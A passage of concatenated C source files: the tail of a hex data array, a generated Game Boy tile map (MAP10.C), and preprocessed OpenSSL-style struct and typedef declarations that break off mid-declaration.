0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB, 0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X24,0XAA,0X00,0X00,0X00,0X00,0X81,0X28, 0X06,0XF3,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB, 0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB, 0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB, 0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB, 0X26,0XFB,0X06,0XF3,0X81,0X28,0X00,0X00,0X00,0X00,0X00,0X00,0X81,0X28,0X44,0XB2, 0X06,0XF3,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB, 0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB, 0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB, 0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X06,0XF3,0X44,0XB2,0X81,0X28, 0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00, 0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00, 0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00, 0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00, 0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00, };
the_stack_data/48575731.c
/* MAP10.C Map Source File. Info: Section : Bank : 0 Map size : 20 x 18 Tile set : D:\Programming\C++\GameBoyJam\MHDemake\sprites\background.gbr Plane count : 1 plane (8 bits) Plane order : Tiles are continues Tile offset : 0 Split data : No This file was generated by GBMB v1.8 */ #define Map10Width 20 #define Map10Height 18 #define Map10Bank 0 #define Map10\ 0x04,0x04,0x04,0x04,0x04,0x04,0x04,0x04,0x04,0x04,\ 0x04,0x04,0x04,0x04,0x04,0x04,0x04,0x04,0x04,0x04,\ 0x04,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\ 0x03,0x06,0x00,0x00,0x00,0x00,0x00,0x00,0x03,0x04,\ 0x04,0x02,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\ 0x03,0x06,0x00,0x00,0x00,0x00,0x00,0x0B,0x03,0x04,\ 0x04,0x03,0x03,0x03,0x03,0x03,0x03,0x03,0x00,0x00,\ 0x03,0x06,0x00,0x00,0x00,0x03,0x03,0x03,0x03,0x04,\ 0x04,0x00,0x00,0x00,0x03,0x00,0x00,0x00,0x00,0x00,\ 0x03,0x06,0x00,0x00,0x00,0x00,0x00,0x00,0x08,0x04,\ 0x04,0x01,0x00,0x0B,0x03,0x09,0x00,0x00,0x00,0x00,\ 0x03,0x06,0x00,0x00,0x00,0x00,0x00,0x00,0x08,0x04,\ 0x04,0x03,0x03,0x03,0x03,0x03,0x03,0x06,0x00,0x00,\ 0x03,0x06,0x00,0x00,0x00,0x03,0x03,0x03,0x03,0x04,\ 0x04,0x00,0x00,0x00,0x00,0x00,0x03,0x06,0x00,0x00,\ 0x03,0x06,0x00,0x00,0x00,0x00,0x00,0x00,0x08,0x04,\ 0x04,0x00,0x00,0x00,0x00,0x00,0x03,0x06,0x00,0x00,\ 0x03,0x06,0x00,0x00,0x00,0x00,0x00,0x00,0x08,0x04,\ 0x04,0x0A,0x00,0x00,0x00,0x00,0x03,0x05,0x05,0x05,\ 0x03,0x06,0x00,0x03,0x03,0x03,0x00,0x00,0x08,0x04,\ 0x04,0x03,0x03,0x03,0x00,0x00,0x08,0x03,0x03,0x03,\ 0x03,0x06,0x00,0x00,0x00,0x00,0x00,0x00,0x08,0x04,\ 0x04,0x00,0x00,0x00,0x00,0x00,0x08,0x03,0x06,0x00,\ 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x08,0x04,\ 0x04,0x00,0x00,0x00,0x00,0x00,0x00,0x03,0x06,0x00,\ 0x00,0x00,0x00,0x00,0x00,0x03,0x03,0x00,0x08,0x04,\ 0x04,0x00,0x00,0x00,0x00,0x00,0x00,0x03,0x06,0x00,\ 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x08,0x04,\ 0x04,0x00,0x00,0x00,0x05,0x05,0x00,0x03,0x06,0x00,\ 0x00,0x00,0x00,0x00,0x05,0x05,0x00,0x00,0x08,0x04,\ 0x04,0x00,0x00,0x00,0x03,0x03,0x03,0x03,0x06,0x00,\ 0x00,0x00,0x03,0x03,0x03,0x03,0x00,0x00,0x08,0x04,\ 0x04,0x09,0x00,0x00,0x03,0x03,0x03,0x03,0x06,0x0A,\ 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x08,0x04,\ 0x04,0x04,0x04,0x04,0x04,0x04,0x04,0x04,0x04,0x04,\ 0x04,0x04,0x04,0x04,0x04,0x04,0x04,0x04,0x04,0x04\ /* End of MAP10.C */
the_stack_data/70449878.c
typedef unsigned int size_t; typedef long __time_t; struct buf_mem_st { int length ; char *data ; int max ; }; typedef struct buf_mem_st BUF_MEM; typedef __time_t time_t; struct stack_st { int num ; char **data ; int sorted ; int num_alloc ; int (*comp)(char const * const * , char const * const * ) ; }; typedef struct stack_st STACK; struct bio_st; struct crypto_ex_data_st { STACK *sk ; int dummy ; }; typedef struct crypto_ex_data_st CRYPTO_EX_DATA; typedef struct bio_st BIO; typedef void bio_info_cb(struct bio_st * , int , char const * , int , long , long );struct bio_method_st { int type ; char const *name ; int (*bwrite)(BIO * , char const * , int ) ; int (*bread)(BIO * , char * , int ) ; int (*bputs)(BIO * , char const * ) ; int (*bgets)(BIO * , char * , int ) ; long (*ctrl)(BIO * , int , long , void * ) ; int (*create)(BIO * ) ; int (*destroy)(BIO * ) ; long (*callback_ctrl)(BIO * , int , bio_info_cb * ) ; }; typedef struct bio_method_st BIO_METHOD; struct bio_st { BIO_METHOD *method ; long (*callback)(struct bio_st * , int , char const * , int , long , long ) ; char *cb_arg ; int init ; int shutdown ; int flags ; int retry_reason ; int num ; void *ptr ; struct bio_st *next_bio ; struct bio_st *prev_bio ; int references ; unsigned long num_read ; unsigned long num_write ; CRYPTO_EX_DATA ex_data ; }; struct bignum_st { unsigned long *d ; int top ; int dmax ; int neg ; int flags ; }; typedef struct bignum_st BIGNUM; struct bignum_ctx { int tos ; BIGNUM bn[16] ; int flags ; int depth ; int pos[12] ; int too_many ; }; typedef struct bignum_ctx BN_CTX; struct bn_blinding_st { int init ; BIGNUM *A ; BIGNUM *Ai ; BIGNUM *mod ; }; typedef struct bn_blinding_st BN_BLINDING; struct bn_mont_ctx_st { int ri ; BIGNUM RR ; BIGNUM N ; BIGNUM Ni ; unsigned long n0 ; int flags ; }; typedef struct bn_mont_ctx_st BN_MONT_CTX; struct X509_algor_st;struct X509_algor_st; struct asn1_object_st { char const *sn ; char const *ln ; int nid ; int length ; unsigned char *data ; int flags ; }; typedef struct asn1_object_st ASN1_OBJECT; struct asn1_string_st { int length ; int type ; unsigned char *data ; long flags ; }; typedef struct asn1_string_st ASN1_STRING; typedef struct asn1_string_st ASN1_INTEGER; typedef struct asn1_string_st ASN1_ENUMERATED; typedef struct asn1_string_st ASN1_BIT_STRING; typedef struct asn1_string_st ASN1_OCTET_STRING; typedef struct asn1_string_st ASN1_PRINTABLESTRING; typedef struct asn1_string_st ASN1_T61STRING; typedef struct asn1_string_st ASN1_IA5STRING; typedef struct asn1_string_st ASN1_GENERALSTRING; typedef struct asn1_string_st ASN1_UNIVERSALSTRING; typedef struct asn1_string_st ASN1_BMPSTRING; typedef struct asn1_string_st ASN1_UTCTIME; typedef struct asn1_string_st ASN1_TIME; typedef struct asn1_string_st ASN1_GENERALIZEDTIME; typedef struct asn1_string_st ASN1_VISIBLESTRING; typedef struct asn1_string_st ASN1_UTF8STRING; typedef int ASN1_BOOLEAN; union __anonunion_value_19 { char *ptr ; ASN1_BOOLEAN boolean ; ASN1_STRING *asn1_string ; ASN1_OBJECT *object ; ASN1_INTEGER *integer ; ASN1_ENUMERATED *enumerated ; ASN1_BIT_STRING *bit_string ; ASN1_OCTET_STRING *octet_string ; ASN1_PRINTABLESTRING *printablestring ; ASN1_T61STRING *t61string ; ASN1_IA5STRING *ia5string ; ASN1_GENERALSTRING *generalstring ; ASN1_BMPSTRING *bmpstring ; ASN1_UNIVERSALSTRING *universalstring ; ASN1_UTCTIME *utctime ; ASN1_GENERALIZEDTIME *generalizedtime ; ASN1_VISIBLESTRING *visiblestring ; ASN1_UTF8STRING *utf8string ; ASN1_STRING *set ; ASN1_STRING *sequence ; }; struct asn1_type_st { int type ; union __anonunion_value_19 value ; }; typedef struct asn1_type_st ASN1_TYPE; struct MD5state_st { unsigned int A ; unsigned int B ; unsigned int C ; unsigned int D ; unsigned int Nl ; unsigned int Nh ; unsigned int data[16] ; int num ; }; typedef struct MD5state_st MD5_CTX; struct SHAstate_st { unsigned int h0 ; unsigned int h1 ; unsigned int h2 ; unsigned int h3 ; unsigned int h4 ; unsigned int Nl ; unsigned int Nh ; unsigned int data[16] ; int num ; }; typedef struct SHAstate_st SHA_CTX; struct MD2state_st { int num ; unsigned char data[16] ; unsigned int cksm[16] ; unsigned int state[16] ; }; typedef struct MD2state_st MD2_CTX; struct MD4state_st { unsigned int A ; unsigned int B ; unsigned int C ; unsigned int D ; unsigned int Nl ; unsigned int Nh ; unsigned int data[16] ; int num ; }; typedef struct MD4state_st MD4_CTX; struct RIPEMD160state_st { unsigned int A ; unsigned int B ; unsigned int C ; unsigned int D ; unsigned int E ; unsigned int Nl ; unsigned int Nh ; unsigned int data[16] ; int num ; }; typedef struct RIPEMD160state_st RIPEMD160_CTX; typedef unsigned char des_cblock[8]; union __anonunion_ks_20 { des_cblock cblock ; unsigned long deslong[2] ; }; struct des_ks_struct { union __anonunion_ks_20 ks ; int weak_key ; }; typedef struct des_ks_struct des_key_schedule[16]; struct rc4_key_st { unsigned int x ; unsigned int y ; unsigned int data[256] ; }; typedef struct rc4_key_st RC4_KEY; struct rc2_key_st { unsigned int data[64] ; }; typedef struct rc2_key_st RC2_KEY; struct rc5_key_st { int rounds ; unsigned long data[34] ; }; typedef struct rc5_key_st RC5_32_KEY; struct bf_key_st { unsigned int P[18] ; unsigned int S[1024] ; }; typedef struct bf_key_st BF_KEY; struct cast_key_st { unsigned long data[32] ; int short_key ; }; typedef struct cast_key_st CAST_KEY; struct idea_key_st { unsigned int data[9][6] ; }; typedef struct idea_key_st IDEA_KEY_SCHEDULE; struct mdc2_ctx_st { int num ; unsigned char data[8] ; des_cblock h ; des_cblock hh ; int pad_type ; }; typedef struct mdc2_ctx_st MDC2_CTX; struct rsa_st;typedef struct rsa_st RSA; struct rsa_meth_st { char const *name ; int (*rsa_pub_enc)(int flen , unsigned char *from , unsigned char *to , RSA *rsa , int padding ) ; int (*rsa_pub_dec)(int flen , unsigned char *from , unsigned char *to , RSA *rsa , int padding ) ; int (*rsa_priv_enc)(int flen , unsigned char *from , unsigned char *to , RSA *rsa , int padding ) ; int (*rsa_priv_dec)(int flen , unsigned char *from , unsigned char *to , RSA *rsa , int padding ) ; int (*rsa_mod_exp)(BIGNUM *r0 , BIGNUM *I , RSA *rsa ) ; int (*bn_mod_exp)(BIGNUM *r , BIGNUM *a , BIGNUM const *p , BIGNUM const *m , BN_CTX *ctx , BN_MONT_CTX *m_ctx ) ; int (*init)(RSA *rsa ) ; int (*finish)(RSA *rsa ) ; int flags ; char *app_data ; int (*rsa_sign)(int type , unsigned char *m , unsigned int m_len , unsigned char *sigret , unsigned int *siglen , RSA *rsa ) ; int (*rsa_verify)(int dtype , unsigned char *m , unsigned int m_len , unsigned char *sigbuf , unsigned int siglen , RSA *rsa ) ; }; typedef struct rsa_meth_st RSA_METHOD; struct rsa_st { int pad ; int version ; RSA_METHOD *meth ; BIGNUM *n ; BIGNUM *e ; BIGNUM *d ; BIGNUM *p ; BIGNUM *q ; BIGNUM *dmp1 ; BIGNUM *dmq1 ; BIGNUM *iqmp ; CRYPTO_EX_DATA ex_data ; int references ; int flags ; BN_MONT_CTX *_method_mod_n ; BN_MONT_CTX *_method_mod_p ; BN_MONT_CTX *_method_mod_q ; char *bignum_data ; BN_BLINDING *blinding ; }; struct dh_st;typedef struct dh_st DH; struct dh_method { char const *name ; int (*generate_key)(DH *dh ) ; int (*compute_key)(unsigned char *key , BIGNUM *pub_key , DH *dh ) ; int (*bn_mod_exp)(DH *dh , BIGNUM *r , BIGNUM *a , BIGNUM const *p , BIGNUM const *m , BN_CTX *ctx , BN_MONT_CTX *m_ctx ) ; int (*init)(DH *dh ) ; int (*finish)(DH *dh ) ; int flags ; char *app_data ; }; typedef struct dh_method DH_METHOD; struct dh_st { int pad ; int version ; BIGNUM *p ; BIGNUM *g ; int length ; BIGNUM *pub_key ; BIGNUM *priv_key ; int flags ; char *method_mont_p ; BIGNUM *q ; BIGNUM *j ; unsigned char *seed ; int seedlen ; BIGNUM *counter ; int references ; CRYPTO_EX_DATA ex_data ; DH_METHOD *meth ; }; struct dsa_st;typedef struct dsa_st DSA; struct DSA_SIG_st { BIGNUM *r ; BIGNUM *s ; }; typedef struct DSA_SIG_st DSA_SIG; struct dsa_method { char const *name ; DSA_SIG *(*dsa_do_sign)(unsigned char const *dgst , int dlen , DSA *dsa ) ; int (*dsa_sign_setup)(DSA *dsa , BN_CTX *ctx_in , BIGNUM **kinvp , BIGNUM **rp ) ; int (*dsa_do_verify)(unsigned char const *dgst , int dgst_len , DSA_SIG *sig , DSA *dsa ) ; int (*dsa_mod_exp)(DSA *dsa , BIGNUM *rr , BIGNUM *a1 , BIGNUM *p1 , BIGNUM *a2 , BIGNUM *p2 , BIGNUM *m , BN_CTX *ctx , BN_MONT_CTX *in_mont ) ; int (*bn_mod_exp)(DSA *dsa , BIGNUM *r , BIGNUM *a , BIGNUM const *p , BIGNUM const *m , BN_CTX *ctx , BN_MONT_CTX *m_ctx ) ; int (*init)(DSA *dsa ) ; int (*finish)(DSA *dsa ) ; int flags ; char *app_data ; }; typedef struct dsa_method DSA_METHOD; struct dsa_st { int pad ; int version ; int write_params ; BIGNUM *p ; BIGNUM *q ; BIGNUM *g ; BIGNUM *pub_key ; BIGNUM *priv_key ; BIGNUM *kinv ; BIGNUM *r ; int flags ; char *method_mont_p ; int references ; CRYPTO_EX_DATA ex_data ; DSA_METHOD *meth ; }; union __anonunion_pkey_21 { char *ptr ; struct rsa_st *rsa ; struct dsa_st *dsa ; struct dh_st *dh ; }; struct evp_pkey_st { int type ; int save_type ; int references ; union __anonunion_pkey_21 pkey ; int save_parameters ; STACK *attributes ; }; typedef struct evp_pkey_st EVP_PKEY; struct env_md_st { int type ; int pkey_type ; int md_size ; void (*init)() ; void (*update)() ; void (*final)() ; int (*sign)() ; int (*verify)() ; int required_pkey_type[5] ; int block_size ; int ctx_size ; }; typedef struct env_md_st EVP_MD; union __anonunion_md_22 { unsigned char base[4] ; MD2_CTX md2 ; MD5_CTX md5 ; MD4_CTX md4 ; RIPEMD160_CTX ripemd160 ; SHA_CTX sha ; MDC2_CTX mdc2 ; }; struct env_md_ctx_st { EVP_MD const *digest ; union __anonunion_md_22 md ; }; typedef struct env_md_ctx_st EVP_MD_CTX; struct evp_cipher_st;typedef struct evp_cipher_st EVP_CIPHER; struct evp_cipher_ctx_st;typedef struct evp_cipher_ctx_st EVP_CIPHER_CTX; struct evp_cipher_st { int nid ; int block_size ; int key_len ; int iv_len ; unsigned long flags ; int (*init)(EVP_CIPHER_CTX *ctx , unsigned char const *key , unsigned char const *iv , int enc ) ; int (*do_cipher)(EVP_CIPHER_CTX *ctx , unsigned char *out , unsigned char const *in , unsigned int inl ) ; int (*cleanup)(EVP_CIPHER_CTX * ) ; int ctx_size ; int (*set_asn1_parameters)(EVP_CIPHER_CTX * , ASN1_TYPE * ) ; int (*get_asn1_parameters)(EVP_CIPHER_CTX * , ASN1_TYPE * ) ; int (*ctrl)(EVP_CIPHER_CTX * , int type , int arg , void *ptr ) ; void *app_data ; }; struct __anonstruct_rc4_24 { unsigned char key[16] ; RC4_KEY ks ; }; struct __anonstruct_desx_cbc_25 { des_key_schedule ks ; des_cblock inw ; des_cblock outw ; }; struct __anonstruct_des_ede_26 { des_key_schedule ks1 ; des_key_schedule ks2 ; des_key_schedule ks3 ; }; struct __anonstruct_rc2_27 { int key_bits ; RC2_KEY ks ; }; struct __anonstruct_rc5_28 { int rounds ; RC5_32_KEY ks ; }; union __anonunion_c_23 { struct __anonstruct_rc4_24 rc4 ; des_key_schedule des_ks ; struct __anonstruct_desx_cbc_25 desx_cbc ; struct __anonstruct_des_ede_26 des_ede ; IDEA_KEY_SCHEDULE idea_ks ; struct __anonstruct_rc2_27 rc2 ; struct __anonstruct_rc5_28 rc5 ; BF_KEY bf_ks ; CAST_KEY cast_ks ; }; struct evp_cipher_ctx_st { EVP_CIPHER const *cipher ; int encrypt ; int buf_len ; unsigned char oiv[8] ; unsigned char iv[8] ; unsigned char buf[8] ; int num ; void *app_data ; int key_len ; union __anonunion_c_23 c ; }; struct X509_algor_st { ASN1_OBJECT *algorithm ; ASN1_TYPE *parameter ; }; typedef struct X509_algor_st X509_ALGOR; struct X509_val_st { ASN1_TIME *notBefore ; ASN1_TIME *notAfter ; }; typedef struct X509_val_st X509_VAL; struct X509_pubkey_st { X509_ALGOR *algor ; ASN1_BIT_STRING *public_key ; EVP_PKEY *pkey ; }; typedef struct X509_pubkey_st X509_PUBKEY; struct X509_name_st { STACK *entries ; int modified ; BUF_MEM *bytes ; unsigned long hash ; }; typedef struct X509_name_st X509_NAME; struct x509_cinf_st { ASN1_INTEGER *version ; ASN1_INTEGER *serialNumber ; X509_ALGOR *signature ; X509_NAME *issuer ; X509_VAL *validity ; X509_NAME *subject ; X509_PUBKEY *key ; ASN1_BIT_STRING *issuerUID ; ASN1_BIT_STRING *subjectUID ; STACK *extensions ; }; typedef struct x509_cinf_st X509_CINF; struct x509_cert_aux_st { STACK *trust ; STACK *reject ; ASN1_UTF8STRING *alias ; ASN1_OCTET_STRING *keyid ; STACK *other ; }; typedef struct x509_cert_aux_st X509_CERT_AUX; struct AUTHORITY_KEYID_st;struct x509_st { X509_CINF *cert_info ; X509_ALGOR *sig_alg ; ASN1_BIT_STRING *signature ; int valid ; int references ; char *name ; CRYPTO_EX_DATA ex_data ; long ex_pathlen ; unsigned long ex_flags ; unsigned long ex_kusage ; unsigned long ex_xkusage ; unsigned long ex_nscert ; ASN1_OCTET_STRING *skid ; struct AUTHORITY_KEYID_st *akid ; unsigned char sha1_hash[20] ; X509_CERT_AUX *aux ; }; typedef struct x509_st X509; struct lhash_node_st { void *data ; struct lhash_node_st *next ; unsigned long hash ; }; typedef struct lhash_node_st LHASH_NODE; struct lhash_st { LHASH_NODE **b ; int (*comp)() ; unsigned long (*hash)() ; unsigned int num_nodes ; unsigned int num_alloc_nodes ; unsigned int p ; unsigned int pmax ; unsigned long up_load ; unsigned long down_load ; unsigned long num_items ; unsigned long num_expands ; unsigned long num_expand_reallocs ; unsigned long num_contracts ; unsigned long num_contract_reallocs ; unsigned long num_hash_calls ; unsigned long num_comp_calls ; unsigned long num_insert ; unsigned long num_replace ; unsigned long num_delete ; unsigned long num_no_delete ; unsigned long num_retrieve ; unsigned long num_retrieve_miss ; unsigned long num_hash_comps ; int error ; }; struct x509_store_ctx_st;typedef struct x509_store_ctx_st X509_STORE_CTX; struct x509_store_st { int cache ; STACK *objs ; STACK *get_cert_methods ; int (*verify)(X509_STORE_CTX *ctx ) ; int (*verify_cb)(int ok , X509_STORE_CTX *ctx ) ; CRYPTO_EX_DATA ex_data ; int references ; int depth ; }; typedef struct x509_store_st X509_STORE; struct x509_store_ctx_st { X509_STORE *ctx ; int current_method ; X509 *cert ; STACK *untrusted ; int purpose ; int trust ; time_t check_time ; unsigned long flags ; void *other_ctx ; int (*verify)(X509_STORE_CTX *ctx ) ; int (*verify_cb)(int ok , X509_STORE_CTX *ctx ) ; int (*get_issuer)(X509 **issuer , X509_STORE_CTX *ctx , X509 *x ) ; int (*check_issued)(X509_STORE_CTX *ctx , X509 *x , X509 *issuer ) ; int (*cleanup)(X509_STORE_CTX *ctx ) ; int depth ; int valid ; int last_untrusted ; STACK *chain ; int error_depth ; int error ; X509 *current_cert ; X509 *current_issuer ; CRYPTO_EX_DATA ex_data ; }; struct comp_method_st { int type ; char const *name ; int (*init)() ; void (*finish)() ; int (*compress)() ; int (*expand)() ; long (*ctrl)() ; long (*callback_ctrl)() ; }; typedef struct comp_method_st COMP_METHOD; struct comp_ctx_st { COMP_METHOD *meth ; unsigned long compress_in ; unsigned long compress_out ; unsigned long expand_in ; unsigned long expand_out ; CRYPTO_EX_DATA ex_data ; }; typedef struct comp_ctx_st COMP_CTX; typedef int pem_password_cb(char *buf , int size , int rwflag , void *userdata ); struct ssl_st; struct ssl_cipher_st { int valid ; char const *name ; unsigned long id ; unsigned long algorithms ; unsigned long algo_strength ; unsigned long algorithm2 ; int strength_bits ; int alg_bits ; unsigned long mask ; unsigned long mask_strength ; }; typedef struct ssl_cipher_st SSL_CIPHER; typedef struct ssl_st SSL; struct ssl_ctx_st;typedef struct ssl_ctx_st SSL_CTX; struct ssl3_enc_method;struct ssl_method_st { int version ; int (*ssl_new)(SSL *s ) ; void (*ssl_clear)(SSL *s ) ; void (*ssl_free)(SSL *s ) ; int (*ssl_accept)(SSL *s ) ; int (*ssl_connect)(SSL *s ) ; int (*ssl_read)(SSL *s , void *buf , int len ) ; int (*ssl_peek)(SSL *s , void *buf , int len ) ; int (*ssl_write)(SSL *s , void const *buf , int len ) ; int (*ssl_shutdown)(SSL *s ) ; int (*ssl_renegotiate)(SSL *s ) ; int (*ssl_renegotiate_check)(SSL *s ) ; long (*ssl_ctrl)(SSL *s , int cmd , long larg , char *parg ) ; long (*ssl_ctx_ctrl)(SSL_CTX *ctx , int cmd , long larg , char *parg ) ; SSL_CIPHER *(*get_cipher_by_char)(unsigned char const *ptr ) ; int (*put_cipher_by_char)(SSL_CIPHER const *cipher , unsigned char *ptr ) ; int (*ssl_pending)(SSL *s ) ; int (*num_ciphers)(void) ; SSL_CIPHER *(*get_cipher)(unsigned int ncipher ) ; struct ssl_method_st *(*get_ssl_method)(int version ) ; long (*get_timeout)(void) ; struct ssl3_enc_method *ssl3_enc ; int (*ssl_version)() ; long (*ssl_callback_ctrl)(SSL *s , int cb_id , void (*fp)() ) ; long (*ssl_ctx_callback_ctrl)(SSL_CTX *s , int cb_id , void (*fp)() ) ; }; typedef struct ssl_method_st SSL_METHOD; struct sess_cert_st;struct ssl_session_st { int ssl_version ; unsigned int key_arg_length ; unsigned char key_arg[8] ; int master_key_length ; unsigned char master_key[48] ; unsigned int session_id_length ; unsigned char session_id[32] ; unsigned int sid_ctx_length ; unsigned char sid_ctx[32] ; int not_resumable ; struct sess_cert_st *sess_cert ; X509 *peer ; long verify_result ; int references ; long timeout ; long time ; int compress_meth ; SSL_CIPHER *cipher ; unsigned long cipher_id ; STACK *ciphers ; CRYPTO_EX_DATA ex_data ; struct ssl_session_st *prev ; struct ssl_session_st *next ; }; typedef struct ssl_session_st SSL_SESSION; struct ssl_comp_st { int id ; char *name ; COMP_METHOD *method ; }; typedef struct ssl_comp_st SSL_COMP; struct __anonstruct_stats_37 { int sess_connect ; int sess_connect_renegotiate ; int sess_connect_good ; int sess_accept ; int sess_accept_renegotiate ; int sess_accept_good ; int sess_miss ; int sess_timeout ; int sess_cache_full ; int sess_hit ; int sess_cb_hit ; }; struct cert_st;struct ssl_ctx_st { SSL_METHOD *method ; unsigned long options ; unsigned long mode ; STACK *cipher_list ; STACK *cipher_list_by_id ; struct x509_store_st *cert_store ; struct lhash_st *sessions ; unsigned long session_cache_size ; struct ssl_session_st *session_cache_head ; struct ssl_session_st *session_cache_tail ; int session_cache_mode ; long session_timeout ; int (*new_session_cb)(struct ssl_st *ssl , SSL_SESSION *sess ) ; void (*remove_session_cb)(struct ssl_ctx_st *ctx , SSL_SESSION *sess ) ; SSL_SESSION *(*get_session_cb)(struct ssl_st *ssl , unsigned char *data , int len , int *copy ) ; struct __anonstruct_stats_37 stats ; int references ; void (*info_callback)() ; int (*app_verify_callback)() ; char *app_verify_arg ; struct cert_st *cert ; int read_ahead ; int verify_mode ; int verify_depth ; unsigned int sid_ctx_length ; unsigned char sid_ctx[32] ; int (*default_verify_callback)(int ok , X509_STORE_CTX *ctx ) ; int purpose ; int trust ; pem_password_cb *default_passwd_callback ; void *default_passwd_callback_userdata ; int (*client_cert_cb)() ; STACK *client_CA ; int quiet_shutdown ; CRYPTO_EX_DATA ex_data ; EVP_MD const *rsa_md5 ; EVP_MD const *md5 ; EVP_MD const *sha1 ; STACK *extra_certs ; STACK *comp_methods ; }; struct ssl2_state_st;struct ssl3_state_st;struct ssl_st { int version ; int type ; SSL_METHOD *method ; BIO *rbio ; BIO *wbio ; BIO *bbio ; int rwstate ; int in_handshake ; int (*handshake_func)() ; int server ; int new_session ; int quiet_shutdown ; int shutdown ; int state ; int rstate ; BUF_MEM *init_buf ; int init_num ; int init_off ; unsigned char *packet ; unsigned int packet_length ; struct ssl2_state_st *s2 ; struct ssl3_state_st *s3 ; int read_ahead ; int hit ; int purpose ; int trust ; STACK *cipher_list ; STACK *cipher_list_by_id ; EVP_CIPHER_CTX *enc_read_ctx ; EVP_MD const *read_hash ; COMP_CTX *expand ; EVP_CIPHER_CTX *enc_write_ctx ; EVP_MD const *write_hash ; COMP_CTX *compress ; struct cert_st *cert ; unsigned int sid_ctx_length ; unsigned char sid_ctx[32] ; SSL_SESSION *session ; int verify_mode ; int verify_depth ; int (*verify_callback)(int ok , X509_STORE_CTX *ctx ) ; void (*info_callback)() ; int error ; int error_code ; SSL_CTX *ctx ; int debug ; long verify_result ; CRYPTO_EX_DATA ex_data ; STACK *client_CA ; int references ; unsigned long options ; unsigned long mode ; int first_packet ; int client_version ; }; struct __anonstruct_tmp_38 { unsigned int conn_id_length ; unsigned int cert_type ; unsigned int cert_length ; unsigned int csl ; unsigned int clear ; unsigned int enc ; unsigned char ccl[32] ; unsigned int cipher_spec_length ; unsigned int session_id_length ; unsigned int clen ; unsigned int rlen ; }; struct ssl2_state_st { int three_byte_header ; int clear_text ; int escape ; int ssl2_rollback ; unsigned int wnum ; int wpend_tot ; unsigned char const *wpend_buf ; int wpend_off ; int wpend_len ; int wpend_ret ; int rbuf_left ; int rbuf_offs ; unsigned char *rbuf ; unsigned char *wbuf ; unsigned char *write_ptr ; unsigned int padding ; unsigned int rlength ; int ract_data_length ; unsigned int wlength ; int wact_data_length ; unsigned char *ract_data ; unsigned char *wact_data ; unsigned char *mac_data ; unsigned char *pad_data_UNUSED ; unsigned char *read_key ; unsigned char *write_key ; unsigned int challenge_length ; unsigned char challenge[32] ; unsigned int conn_id_length ; unsigned char conn_id[16] ; unsigned int key_material_length ; unsigned char key_material[48] ; unsigned long read_sequence ; unsigned long write_sequence ; struct __anonstruct_tmp_38 tmp ; }; struct ssl3_record_st { int type ; unsigned int length ; unsigned int off ; unsigned char *data ; unsigned char *input ; unsigned char *comp ; }; typedef struct ssl3_record_st SSL3_RECORD; struct ssl3_buffer_st { unsigned char *buf ; int offset ; int left ; }; typedef struct ssl3_buffer_st SSL3_BUFFER; struct __anonstruct_tmp_39 { unsigned char cert_verify_md[72] ; unsigned char finish_md[72] ; int finish_md_len ; unsigned char peer_finish_md[72] ; int peer_finish_md_len ; unsigned long message_size ; int message_type ; SSL_CIPHER *new_cipher ; DH *dh ; int next_state ; int reuse_message ; int cert_req ; int ctype_num ; char ctype[7] ; STACK *ca_names ; int use_rsa_tmp ; int key_block_length ; unsigned char *key_block ; EVP_CIPHER const *new_sym_enc ; EVP_MD const *new_hash ; SSL_COMP const *new_compression ; int cert_request ; }; struct ssl3_state_st { long flags ; int delay_buf_pop_ret ; unsigned char read_sequence[8] ; unsigned char read_mac_secret[36] ; unsigned char write_sequence[8] ; unsigned char write_mac_secret[36] ; unsigned char server_random[32] ; unsigned char client_random[32] ; SSL3_BUFFER rbuf ; SSL3_BUFFER wbuf ; SSL3_RECORD rrec ; SSL3_RECORD wrec ; unsigned char alert_fragment[2] ; unsigned int alert_fragment_len ; unsigned char handshake_fragment[4] ; unsigned int handshake_fragment_len ; unsigned int wnum ; int wpend_tot ; int wpend_type ; int wpend_ret ; unsigned char const *wpend_buf ; EVP_MD_CTX finish_dgst1 ; EVP_MD_CTX finish_dgst2 ; int change_cipher_spec ; int warn_alert ; int fatal_alert ; int alert_dispatch ; unsigned char send_alert[2] ; int renegotiate ; int total_renegotiations ; int num_renegotiations ; int in_read_app_data ; struct __anonstruct_tmp_39 tmp ; }; struct cert_pkey_st { X509 *x509 ; EVP_PKEY *privatekey ; }; typedef struct cert_pkey_st CERT_PKEY; struct cert_st { CERT_PKEY *key ; int valid ; unsigned long mask ; unsigned long export_mask ; RSA *rsa_tmp ; RSA *(*rsa_tmp_cb)(SSL 